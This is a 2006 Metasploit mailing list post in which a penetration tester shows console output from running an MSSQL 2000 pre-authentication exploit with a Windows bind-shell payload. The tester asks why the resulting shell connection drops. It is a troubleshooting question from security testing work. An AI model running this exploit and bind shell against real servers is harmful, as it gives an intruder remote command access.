Metasploit mailing list archives

Exploit MSSQL HELO vuln

From: joshuaperrymon at gmail.com (Josh L. Perrymon)
Date: Wed, 5 Apr 2006 13:11:51 +1000

Hey Guys,

I'm working on a penetration test and have found a MSSQL install vulnerable
to the HELO exploit-

Both networks are behind firewalls... )attacker and (target

I setup metasploit 2.5 with the exploit > Payload > and RHOST and LHOST
info..

Exploit is sent using win32_bindshell

-------------------

msf mssql2000_preauthentication(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Saying hello to Microsoft SQL Server 2000 / MSDE 2000  (0x42b68aba /
0x42d01e50)
[*] Got connection from 127.0.0.1:2109 <-> 127.0.0.1:33334

[*] Exiting Bind Handler.

msf mssql2000_preauthentication(win32_bind) >

--------------------------

Does this mean the remote machine has a connection to my local machine? When
I try telnetting to 127.0.0.1:33334 it has a blinking cursor then drops the
connection????

I haven't used the bind_shell payload before becuase I usually have the
ability to put myself outside the firewall when attampting exploits.

Thanks for the help...

JP
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060405/70555ac4/attachment.htm>

Current thread:

Exploit MSSQL HELO vuln Josh L. Perrymon (Apr 04)
- Exploit MSSQL HELO vuln H D Moore (Apr 05)